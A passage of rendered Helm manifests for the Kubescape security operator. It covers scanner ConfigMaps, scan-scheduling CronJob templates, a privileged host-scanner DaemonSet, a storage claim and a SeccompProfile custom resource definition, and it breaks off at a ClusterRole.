LS0tLS0K + ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-cloud-config + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + kubescape.io/infra: config +data: + clusterData: "{\n \"serviceDiscovery\": false,\n \"vulnScanURL\": \"kubevuln:8080\"\ + ,\n \"kubevulnURL\": \"kubevuln:8080\",\n \"kubescapeURL\": \"kubescape:8080\"\ + ,\n \"clusterName\": \"bobexample\",\n \"storage\": true,\n \"relevantImageVulnerabilitiesEnabled\"\ + : true,\n \"namespace\": \"honey\",\n \"imageVulnerabilitiesScanningEnabled\"\ + : true,\n \"postureScanEnabled\": true,\n \"otelCollector\": false,\n \"nodeAgent\"\ + : \"true\",\n \"maxImageSize\": 5.36870912e+09,\n \"maxSBOMSize\": 2.097152e+07,\n\ + \ \"keepLocal\": true,\n \"scanTimeout\": \"5m\",\n \"scanEmbeddedSBOMs\":\ + \ false,\n \"vexGeneration\": false,\n \"useDefaultMatchers\": false,\n \"\ + storeFilteredSbom\": false,\n \"continuousPostureScan\": false,\n \"relevantImageVulnerabilitiesConfiguration\"\ + : \"enable\"\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: ks-capabilities + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-capabilities + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-capabilities + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + capabilities: "{\n \"capabilities\":{\"admissionController\":\"enable\",\"autoUpgrading\"\ + :\"disable\",\"configurationScan\":\"enable\",\"continuousScan\":\"disable\",\"\ + httpDetection\":\"enable\",\"kubescapeOffline\":\"disable\",\"malwareDetection\"\ + :\"disable\",\"manageWorkloads\":\"disable\",\"networkEventsStreaming\":\"disable\"\ + ,\"networkPolicyService\":\"enable\",\"nodeProfileService\":\"enable\",\"nodeSbomGeneration\"\ + :\"enable\",\"nodeScan\":\"enable\",\"operator\":\"enable\",\"prometheusExporter\"\ + :\"enable\",\"relevancy\":\"enable\",\"runtimeDetection\":\"enable\",\"runtimeObservability\"\ + :\"enable\",\"scanEmbeddedSBOMs\":\"disable\",\"seccompProfileBackend\":\"crd\"\ + ,\"seccompProfileService\":\"enable\",\"syncSBOM\":\"disable\",\"testing\":{\"\ + nodeAgentMultiplication\":{\"enabled\":false,\"replicas\":5}},\"vexGeneration\"\ + :\"disable\",\"vulnerabilityScan\":\"enable\"},\n \"components\":{\"autoUpdater\"\ + :{\"enabled\":false},\"clamAV\":{\"enabled\":false},\"cloudSecret\":{\"create\"\ + :true,\"name\":\"cloud-secret\"},\"customCaCertificates\":{\"name\":\"custom-ca-certificates\"\ + },\"hostScanner\":{\"enabled\":true},\"kubescape\":{\"enabled\":true},\"kubescapeScheduler\"\ + :{\"enabled\":true},\"kubevuln\":{\"enabled\":true},\"kubevulnScheduler\":{\"\ + enabled\":true},\"nodeAgent\":{\"enabled\":true},\"operator\":{\"enabled\":true},\"\ + otelCollector\":{\"enabled\":false},\"prometheusExporter\":{\"enabled\":true},\"\ + serviceDiscovery\":{\"enabled\":false},\"storage\":{\"enabled\":true},\"synchronizer\"\ + :{\"enabled\":false}},\n \"configurations\":{\"excludeJsonPaths\":null,\"otelUrl\"\ + :null,\"persistence\":\"enable\",\"priorityClass\":{\"daemonset\":100000100,\"\ + enabled\":true},\"prometheusAnnotations\":\"disable\"} ,\n \"serviceScanConfig\"\ + \ :{\"enabled\":false,\"interval\":\"1h\"}\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: cs-matching-rules + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + matchingRules.json: '{"match":[{"apiGroups":["apps"],"apiVersions":["v1"],"resources":["deployments"]}],"namespaces":["default"]} + + ' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"CommandName":"kubescapeScan","args":{"scanV1":{}}}]}' +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: host-scanner-definition + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + host-scanner-yaml: "apiVersion: apps/v1\nkind: DaemonSet\nmetadata:\n name: host-scanner\n\ + \ namespace: honey\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\n\ + \ labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n tier:\ + \ ks-control-plane\n kubescape.io/ignore: \"true\"\nspec:\n selector:\n \ + \ matchLabels:\n app.kubernetes.io/name: kubescape-operator\n app.kubernetes.io/instance:\ + \ kubescape\n app.kubernetes.io/component: host-scanner\n template:\n \ + \ metadata:\n annotations:\n \n argocd.argoproj.io/compare-options:\ + \ \"IgnoreExtraneous\"\n argocd.argoproj.io/sync-options: \"Prune=false\"\ + \n labels:\n helm.sh/chart: kubescape-operator-1.30.2\n app.kubernetes.io/name:\ + \ kubescape-operator\n app.kubernetes.io/instance: kubescape\n app.kubernetes.io/component:\ + \ host-scanner\n app.kubernetes.io/version: \"1.30.2\"\n app.kubernetes.io/managed-by:\ + \ Helm\n app.kubernetes.io/part-of: kubescape\n app: host-scanner\n\ + \ tier: ks-control-plane\n kubescape.io/ignore: \"true\"\n \ + \ kubescape.io/tier: \"core\"\n name: host-scanner\n spec:\n \ + \ nodeSelector:\n kubernetes.io/os: linux\n affinity:\n tolerations:\n\ + \ - effect: NoSchedule\n key: node-role.kubernetes.io/control-plane\n\ + \ operator: Exists\n - effect: NoSchedule\n key: node-role.kubernetes.io/master\n\ + \ operator: Exists\n containers:\n - name: host-sensor\n \ + \ image: \"quay.io/kubescape/host-scanner:v1.0.78\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ true\n privileged: true\n readOnlyRootFilesystem: true\n \ + \ env:\n - name: KS_LOGGER_LEVEL\n value: \"info\"\n \ + \ - name: KS_LOGGER_NAME\n value: \"zap\"\n ports:\n \ + \ - name: scanner # Do not change port name\n containerPort: 7888\n\ + \ protocol: TCP\n resources:\n limits:\n \ + \ cpu: 0.4m\n memory: 400Mi\n requests:\n cpu:\ + \ 0.1m\n memory: 200Mi\n volumeMounts:\n - mountPath:\ + \ /host_fs\n name: host-filesystem\n startupProbe:\n \ + \ httpGet:\n path: /readyz\n port: 7888\n failureThreshold:\ + \ 30\n periodSeconds: 1\n livenessProbe:\n httpGet:\n\ + \ path: /healthz\n port: 7888\n periodSeconds:\ + \ 10\n terminationGracePeriodSeconds: 120\n dnsPolicy: ClusterFirstWithHostNet\n\ + \ serviceAccountName: node-agent\n automountServiceAccountToken: false\n\ + \ volumes:\n - hostPath:\n path: /\n type: Directory\n\ + \ name: host-filesystem\n hostPID: true\n hostIPC: true" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-scheduler + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + request-body.json: '{"commands":[{"commandName":"scan","designators":[{"designatorType":"Attributes","attributes":{}}]}]}' +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"applicationProfileServiceEnabled\": true,\n \"backendStorageEnabled\"\ + : false,\n \"prometheusExporterEnabled\": true,\n \"runtimeDetectionEnabled\"\ + : true,\n \"httpDetectionEnabled\": true,\n \"networkServiceEnabled\": true,\n\ + \ \"malwareDetectionEnabled\": false,\n \"hostMalwareSensorEnabled\": false,\n\ + \ \"hostNetworkSensorEnabled\": false,\n \"nodeProfileServiceEnabled\":\ + \ false,\n \"networkStreamingEnabled\": false,\n \"maxImageSize\": 5.36870912e+09,\n\ + \ \"maxSBOMSize\": 2.097152e+07,\n \"sbomGenerationEnabled\": true,\n \ + \ \"enableEmbeddedSBOMs\": false,\n \"seccompServiceEnabled\": true,\n \ + \ \"seccompProfileBackend\": \"crd\",\n \"initialDelay\": \"2m\",\n \"updateDataPeriod\"\ + : \"10000m\",\n \"nodeProfileInterval\": \"10m\",\n \"networkStreamingInterval\"\ + : \"2m\",\n \"maxSniffingTimePerContainer\": \"2m\",\n \"excludeNamespaces\"\ + : \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"excludeLabels\":null,\n \"exporters\": {\n \"alertManagerExporterUrls\"\ + :[],\n \"stdoutExporter\":true,\n \"syslogExporterURL\": \"\"\n },\n\ + \ \"excludeJsonPaths\":null,\n \"ruleCooldown\": {\n \"ruleCooldownDuration\"\ + : \"0h\",\n \"ruleCooldownAfterCount\": 1e+09,\n \"ruleCooldownOnProfileFailure\"\ + : false,\n \"ruleCooldownMaxSize\": 20000\n }\n}\n" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"excludeNamespaces\": \"kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse\"\ + ,\n \"namespace\": \"honey\",\n \"triggersecurityframework\": true,\n \"podScanGuardTime\"\ + : \"1h\",\n \"excludeJsonPaths\":null,\n \"httpExporterConfig\":{\"maxAlertsPerMinute\"\ + :1000,\"method\":\"POST\",\"url\":\"http://synchronizer:8089/apis/v1/kubescape.io\"\ + },\n \"nodeAgentAutoscaler\": {\n \"enabled\": false,\n \"nodeGroupLabel\"\ + : \"node.kubernetes.io/instance-type\",\n \"resourcePercentages\": {\n \ + \ \"requestCPU\": 2,\n \"requestMemory\": 2,\n \"limitCPU\": 5,\n \ + \ \"limitMemory\": 5\n },\n \"minResources\": {\n \"cpu\": \"100m\"\ + ,\n \"memory\": \"600Mi\"\n },\n \"maxResources\": {\n \"cpu\"\ + : \"2000m\",\n \"memory\": \"4Gi\"\n },\n \"reconcileInterval\": \"\ + 5m\",\n \"templatePath\": \"/etc/templates/daemonset-template.yaml\",\n \ + \ \"operatorDeploymentName\": \"operator\"\n }\n}\n" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubescape-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubescape-scheduler\n\ + \ namespace: honey\n labels:\n app: kubescape-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"kubescape-scan\"\nspec:\n \ + \ schedule: \"0 8 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"kubescape-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ kubescape-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubescape\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubescape-scheduler" +--- +kind: ConfigMap +apiVersion: v1 +metadata: + name: kubevuln-cronjob-template + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: kubevuln-scheduler\n\ + \ namespace: honey\n labels:\n app: kubevuln-scheduler\n tier: ks-control-plane\n\ + \ kubescape.io/tier: \"core\"\n armo.tier: \"vuln-scan\"\nspec:\n schedule:\ + \ \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit: 1\n\ + \ jobTemplate:\n spec:\n template:\n metadata:\n labels:\n\ + \ armo.tier: \"vuln-scan\"\n kubescape.io/tier: \"core\"\ + \n spec:\n securityContext:\n seccompProfile:\n \ + \ type: RuntimeDefault\n containers:\n - name: kubevuln-scheduler\n\ + \ image: \"quay.io/kubescape/http-request:v0.2.16\"\n imagePullPolicy:\ + \ IfNotPresent\n securityContext:\n allowPrivilegeEscalation:\ + \ false\n readOnlyRootFilesystem: true\n runAsNonRoot:\ + \ true\n runAsUser: 100\n resources:\n limits:\n\ + \ cpu: 10m\n memory: 20Mi\n requests:\n\ + \ cpu: 1m\n memory: 10Mi\n args:\n \ + \ - -method=post\n - -scheme=http\n - -host=operator:4002\n\ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: kubevuln-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: ks-cloud-config + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: ks-cloud-config + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + name: registry-scan-cronjob-template +data: + cronjobTemplate: "apiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: registry-scheduler\n\ + \ namespace: honey\n labels:\n app: registry-scheduler\n kubescape.io/tier:\ + \ \"core\"\n tier: ks-control-plane\n armo.tier: \"registry-scan\"\nspec:\n\ + \ schedule: \"0 0 * * *\"\n successfulJobsHistoryLimit: 3\n failedJobsHistoryLimit:\ + \ 1\n jobTemplate:\n spec:\n template:\n metadata:\n \ + \ labels:\n armo.tier: \"registry-scan\"\n kubescape.io/tier:\ + \ \"core\"\n spec:\n securityContext:\n seccompProfile:\n\ + \ type: RuntimeDefault\n containers:\n - name:\ + \ registry-scheduler\n image: \"quay.io/kubescape/http-request:v0.2.16\"\ + \n imagePullPolicy: IfNotPresent\n securityContext:\n \ + \ allowPrivilegeEscalation: false\n readOnlyRootFilesystem:\ + \ true\n runAsNonRoot: true\n runAsUser: 100\n \ + \ resources:\n limits:\n cpu: 10m\n \ + \ memory: 20Mi\n requests:\n cpu: 1m\n \ + \ memory: 10Mi\n args:\n - -method=post\n \ + \ - -scheme=http\n - -host=operator:4002\n \ + \ - -path=v1/triggerAction\n - -headers=Content-Type:application/json\n\ + \ - -path-body=/home/ks/request-body.json\n volumeMounts:\n\ + \ - name: \"request-body-volume\"\n mountPath: /home/ks/request-body.json\n\ + \ subPath: request-body.json\n readOnly: true\n\ + \ restartPolicy: Never\n serviceAccountName: kubevuln\n \ + \ automountServiceAccountToken: false\n nodeSelector:\n \ + \ kubernetes.io/os: linux\n affinity:\n tolerations:\n \ + \ volumes:\n - name: \"request-body-volume\" # placeholder\n\ + \ configMap:\n name: registry-scheduler" +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: storage + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +data: + config.json: "{\n \"cleanupInterval\": \"6h\",\n \"disableVirtualCRDs\": false,\n\ + \ \"disableSeccompProfileEndpoint\": true,\n \"excludeJsonPaths\": null,\n \ + \ \"defaultQueueLength\": 100,\n \"defaultWorkerCount\": 2,\n \"defaultMaxObjectSize\"\ + : 400000,\n \"queueManagerEnabled\": true,\n \"kindQueues\": {\"applicationprofiles\"\ + :{\"maxObjectSize\":20000000,\"queueLength\":50,\"workerCount\":2},\"containerprofiles\"\ + :{\"maxObjectSize\":2500000,\"queueLength\":50,\"workerCount\":2},\"networkneighborhoods\"\ + :{\"maxObjectSize\":10000000,\"queueLength\":50,\"workerCount\":2},\"openvulnerabilityexchangecontainers\"\ + :{\"maxObjectSize\":500000,\"queueLength\":50,\"workerCount\":1},\"sbomsyftfiltereds\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1},\"sbomsyfts\"\ + :{\"maxObjectSize\":100000000,\"queueLength\":50,\"workerCount\":1},\"vulnerabilitymanifests\"\ + :{\"maxObjectSize\":50000000,\"queueLength\":50,\"workerCount\":1}},\n \"tlsClientCaFile\"\ + : \"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\",\n \"tlsServerCertFile\"\ + : \"/etc/storage-ca-certificates/tls.crt\",\n \"tlsServerKeyFile\": \"/etc/storage-ca-certificates/tls.key\"\ + ,\n \"serverBindPort\": \"8443\"\n}\n" +--- +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: kubescape-storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 5Gi +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: seccompprofiles.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: seccompprofile + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: seccompprofile + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: kubescape.io + names: + plural: seccompprofiles + singular: seccompprofile + kind: SeccompProfile + listKind: SeccompProfileList + shortNames: + - scp + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + containers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + initContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the init container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + ephemeralContainers: + type: array + items: + type: object + properties: + name: + type: string + description: Name of the ephemeral container + path: + type: string + description: Path to the seccomp profile + spec: + type: object + x-kubernetes-preserve-unknown-fields: true + properties: + disabled: + type: boolean + description: Whether the profile is disabled + baseProfileName: + type: string + description: Name of base profile to union into this profile + defaultAction: + type: string + description: The default action for seccomp + architectures: + type: array + items: + type: string + description: The architecture used for system calls + listenerPath: + type: string + description: Path of UNIX domain socket to contact a seccomp + agent + listenerMetadata: + type: string + description: Opaque data to pass to the seccomp agent + syscalls: + type: array + items: + type: object + properties: + names: + type: array + items: + type: string + description: The names of the syscalls + action: + type: string + description: The action for seccomp rules + errnoRet: + type: integer + format: int64 + description: The errno return code to use + args: + type: array + items: + type: object + properties: + index: + type: integer + format: int64 + description: The index for syscall arguments + value: + type: integer + format: int64 + description: The value for syscall arguments + valueTwo: + type: integer + format: int64 + description: The second value for syscall arguments + op: + type: string + description: The operator for syscall arguments + flags: + type: array + items: + type: string + description: List of flags to use with seccomp(2) + status: + type: object + properties: + containers: + type: object + additionalProperties: + type: object + properties: + conditions: + type: array + items: + type: object + properties: + type: + type: string + description: Type of this condition + status: + type: string + description: Status of this condition (True, False, Unknown) + lastTransitionTime: + type: string + format: date-time + description: Last time this condition transitioned + reason: + type: string + description: Reason for this condition's last transition + message: + type: string + description: Message about this condition's last transition + status: + type: string + description: Profile state + path: + type: string + description: Path to the seccomp profile + activeWorkloads: + type: array + items: + type: string + description: Active workloads using this profile + localhostProfile: + type: string + description: Path for securityContext.seccompProfile.localhostProfile + subresources: + status: {} + additionalPrinterColumns: + - name: Age + type: date + jsonPath: .metadata.creationTimestamp +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 